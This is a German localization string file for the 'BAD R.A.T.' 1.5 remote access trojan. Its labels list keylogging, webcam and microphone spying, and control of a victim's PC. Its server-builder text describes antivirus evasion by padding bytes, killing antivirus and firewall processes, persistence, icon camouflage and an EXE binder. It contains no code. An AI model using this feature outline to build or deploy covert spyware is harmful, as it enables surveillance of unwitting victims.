// Sprachdatei für [BAD R.A.T.] 1.5 beta
// Deutsch/German
// by Mr Hawk
// [BAD R.A.T.]-Company
// www.bad-rat.de.vu
//2005
[Labels]
0=Titel:
1=Text:
2=Notiz: Verwende "|" für <Enter> im Meldungstext!!
3=Es ist wichtig, dass der Ausgangshost als IP da steht!!
4=IP:                       Port:          Pass:
5=Host                                      ersetzen durch
6=Desktophintergrund
7=SystemMenüText
8=Fensterhintergrund
9=SystemMenü
10=Window-Manager
11=Textdrucken
12=SendKey
13=Taskbar
14=Desktop
15=A+S+E
16=CD-Rom
17=Start-Button
18=Dateipfad:
19=Qualität
20=Host-Hijacking
21=(in ms)
22=Befehl:
23=X
24=URL:
25=MSG:
26=hWnd:Window-Title
27=Chatname:
28=Frequenz:
29=Delay(ms):
30=Volume:
31=Balance:
32=L
33=R
34=Netzwerkfreigabe
35=Uhr
36=Monitor
37=Version:
38=IE-Titel:
39=Time:
40=Date:
41=Hinweis: Bei Win2K funzt leider nur das Abmelden
42=Zugriffsrechte für
43=Titel:
44=Text:
45=DLL
46=Funktion
47=Qualität:
48=Text:(max.16 Zeichen)
49=Größe:
50=Geschwindigkeit:
51=langsam = 1 / schnell = 50                                               klein =1 / groß =50
52=Text:
53=Geschwindigkeit:
54=Hintergrundfarbe:
55=Textfarbe:
56=Schriftgröße:
57=Clipboard
58=Kanäle:
59=Kill Prozessnach Headline
60=Screensaver
61=3D-Text
62=Marquee
63=Icone
64=Buttons
65=MsgBox
66=InputBox
67=Beep
68=Volumen
69=ScreenFreez
70=Startseite:
71=Beim Löschen des Users ist kein Passwort notwendig!
72=Dauer(Sekunden):
73=Bildschirmauflösung/Farbe
74=Aufnahme
75=Systemfarben(außer WinXP)
76=Sonstiges
77=Aktuelle Mausposition
78=T blockieren:
79=T/M blockieren:
80=Maus an Position setzen
81=M anzeigen:
82=M vertauschen:
83=Bildpfad(Opfer):
84=Suche
85=Screencontrol II
86=Screencontrol
87=Matrix
88=FlipScreen
89=Soundcontrol
90=Windowsbeenden
91=Speed:
92=MatrixText:
93=ScreenShot
94=Ordner:
95=Name:
96=User:
97=unbeschränkt
98=Notiz:
99=Dos-Console
100=Screensaver:
101=User:
102=Passwort:
103=Keylogger
104=RunDLL32-Befehle
105=Time/Date
106=OfflineKeylogger:
107=Aufnahme
108=Stereo
109=Low
110=Mono
111=Mikrophon
112=Prozess-Manager
113=High
114=Medium
115=Internet Explorer
116=Netzwerkfreigabe
117=FakeMsg
118=Opfer-Chat
119=Scripteditor
120=Datei-Manager
121=Screensaver
122=Spy
123=Tastatur/Maus
124=Reverse Connection/SIN

[Error]
1 = "Webcam-Aufnahme ist fertig..."
2 = "Keine Webcam gefunden..."
3 = "Aufnahmefenster konnte nicht erstellt werden!"
4 = "Keine installierte Webcam gefunden..."
5 = "Fehler beim Pfad, bitte überprüfen"
6 = "Keine Dateien oder Ordner vorhanden!"
7 = "Fehler beim erstellen des Screenshot!"
8 = "CreatePipe verursacht Fehler!"
9 = "Auslesen der Dos-Box fehlgeschlagen!"   X
10 = "Fehler beim Starten des Prozesses!"
11 = "Fehler beim Schließen der MCI!"
12 = "Öffen einer neuen WAV fehlgeschlagen!"
13 = "Einstellungen zur Aufnahme stimmen nicht überein!"
14 = "Aufnahme ist unmöglich!"
15 = "Aufnahme stopen fehlgeschlagen!"
16 = "Speichern fehlgeschlagen!"
17 = "Es ist keine Keylogdatei vorhanden oder es ist ein andere Fehler aufgetretten"
18 = "Kein Passwort"
19 = "Keine Angaben!"

[Button]
1=Verbinden
2=Trennen
3=Net-Watch
4=Senden
5=Test
6=Senden
7=Test
8=EigeneIP
9=Zeit
10=TargetIP
11=Datum
12=Senden
13=Beep senden
14=Beep testen
15=Setting senden
16=Chat beenden
17=End it!
18=Shutdown
19=LogOff
20=Reboot
21=auslesen
22=Clear
23=Prozesse auflisten
24=Kill Prozess
25=Kill Prozess
26=Aktualisieren
27=Laufwerke
28=Umbenennen
29=Starten
30=Neuer Ordner
31=Löschen
32=Kopieren
33=Wallpaper
34=Upload
35=Download
36=Datei suchen
37=Bild drucken
38=CMD
39=Attribute
40=Netzwerke
41=alle auflisten
42=Als ScrSav übernehmen
43=aktivieren
44=deaktivieren
45=aktuellen Screensaver starten
46=Senden
47=Screen horizental drehen
48=Screen vertikal drehen
49=Screen horizental und vertikal drehen
50=Flip beenden
51=ScreenShot erstellen
52=Text senden
53=anzeigen
54=ändern
55=testen
56=an
57=aus
58=lesen
59=setzen
60=System Crash
61=Alles minimieren
62=Script senden
63=Script starten
64=Textdrucken
65=Speichern
66=Aufnahme
67=Userinfos
68=lesen
69=setzen
70=leeren
71=Serverinfos
72=install.Toolz
73=letzte Toolz
74=letzte Filme
75=last CMD
76=Win CD Key
77=Clear
78=Seite öffnen
79=Die 20 meistgenutzten URL's auslesen
80=Host zu IP
81=aufheben
82=Hijack senden
83=Freigabeeinrichten
84=Rechte einrichten
85=User löschen
86=User auslesen
87=setzen
88=Enter
89=Alt
90=RunDLL 32 senden
91=Key senden
92=Schließen
93=Maximieren
94=Minimieren
95=Sperren
96=Freigeben
97=Umbenennen
98=Verstecken
99=Zeigen
100=Variablenliste
101=OfflineKeylog-Datei
102=Srv Events
103=Srv Killerlist

[Nav]
main1=Toolz
main2=Fun
main3=Spy
main4=WinSystem
main5=Server
main6=Misc
toolz1=Email-Tool
toolz2=NetMsg-Flooder
toolz3=Portfreezer
toolz4=ChatBomb
toolz5=EXE-Joiner
toolz6=Crypter
toolz7=IP-Tool
toolz8=EXE2VBS
toolz9=ScriptVirii
toolz10=Downloader
fun1=FakeMsg
fun2=Screencontrol I
fun3=Screencontrol II
fun4=Netzwerkfreigabe
fun5=ScreenSaver
fun6=Mousecontrol
fun7=Soundcontrol
fun8=InternetExplorer
fun9=Textdrucken
fun10=SendKey
fun11=Script Editor
fun12=Chat mit Opfer
fun13=CD-Remote
spy1=AllSpy
spy2=Microphone/Clipboard
winsys1=Datei-Manager
winsys2=Prozess-Manager
winsys3=Window-Manager
winsys4=Registry
winsys5=Windows beenden
winsys6=Dos-Console
winsys7=Favoriten
winsys8=Dienste
winsys9=Control Panel
winsys10=Misc Control
winsys11=TCP-Tunnle
winsys12=MS Config
server1=ServerTool
server2=SIN
server3=NewsAgent
server4=Scripting (ULR)
misc1=Serversetup
misc2=Clientsetting
misc3=Transfer-Manager
misc4=Adressbook
misc5=Plugin-Manager
misc6=Redirect-Downloader
misc7=Client2Client-Chat
misc8=Log-Manager
misc9=Download-Folder
misc10=Tool-Folder
misc11=App-Folder
misc12=Help
misc13=About

[Clientsetting]
0=Clientsetting
1=Aktueller Skin:
2=Hintergrund:
3=Schriftfarbe:
4=Linienfarbe:
5=Textboxhinter.:
6=Textboxschrift:
7=Icone:
8=Banner:
9=Backpic:
10=Main:
11=Nav:
12=Skinby:
13=Aktueller Sprache:
14=Net-Watcher:
15=Standart Einstellungen
16=Standartport:
17=Nickname
18=S.I.N
19=S.I.N.IP
20=S.I.N.Port:
21=Skinname:
22=Client listen
but1=Skinanwenden
but2=Einstellungen speichern
but3=Anwenden
but4=OK

[Reg]
but1=Aktualisieren
but2=Ändern
but3=Löschen
but4=Neu

[Serversetup]
0=Serversetup
1=Servername:
2=Opfername:
3=Passwort:
4=RegName:
5=Port:
6=Event:
7=Msg:
8=Head:
9=Orginal Größe:
10=AddByte:
11=1Byte=8Bits
12=1024Bytes=1KB
13=1024KB=1MB
14=Port:
15=Server
16=Icone
17=Add Bytes
18=Server Setting
19=FakeMsg
20=Notify
21=Startup Methode
22=Killer
23=Icone
24=IP:
25=EXE-Binder
26=S.I.N.
27=CMD deaktivieren
28=Hier können dem Server noch Bytes hinzugefügt werden,um die Anti-Virensystem zusätlich zutäuschen!
29=Keylog Datei:
30=Allen wichtigen Start-Methoden, damit der Server beim Windows -start automatisch gestartet wird.
31=Beendet Prozesse z.B. Anti-Virensysteme und Firewalls.
32=Name ohne*.exe z.B.: notepade
33=Hier könne aus .exe und aus *.dll die Iconen extrahiert werden,die dann inden Server eingesetzt werden.Dies dient als weitere Tarnvorrichtung.
34=Icon
35=Icone wechseln
36=Bytes hinzufügen
37=Install-Dir:
38=Endung:
39=Taskmanager deaktivieren
40=Regeditde aktivieren
41=FakeMsg beim ersten Start
42=ReverseConnection
43=Lokalen Zugriff sperren
44=Melt Server
45=Balloon-Effect
46=KB
47=Anti-Terminate
48=Event Manager
49=Comamnd:
50=Reg Keys
51=HKey:
52=Key:
53=Name:
54=Wert:
55=Warten auf Reboot
56=Statistik
57=Icon
58=EXE-Binder nutzen
59=Exe-Binder-Status
60=Status
61=Gesamt
62=KeylogSize

nav0=Startup-Methode
nav1=Server-Setting
nav2=Notify
nav3=FakeMsg
nav4=Killer
nav5=Events
nav6=Regs
nav7=Icon
nav8=AddBytes
nav9=EXE-Binder
nav10=Statistik

but1=Test
but2=Hinzufügen
but3=Entfernen
but4=Liste laden
but5=Clear
but6=Speichern
but7=Icone laden
but8=Variablenliste
but9=Import
but10=Export
but11=Load Setting
but12=Save Setting
but13=Create Server
but14=PHP/CGI
but15=ICQ
but16=RegAdd
but17=RegDel

[PHPCGI]
0=AddPHP/CGI
1=Script:
2=String:
but1=Zur Liste hinzufügen
but2=Variablenliste

[ControlPanel]
0=Benutzerkonten
1=Modem und Telefon
2=Tastatur
3=System
4=Sound
5=Installierte Software
6=Region
7=Modemeinstellungen
8=Maus
9=Internetoptionen
10=Hardware
11=Gamecontrol
12=Energie
13=Eingabehilfe
14=Drahtlose Verbindung
15=Datum/Zeit
16=Anzeige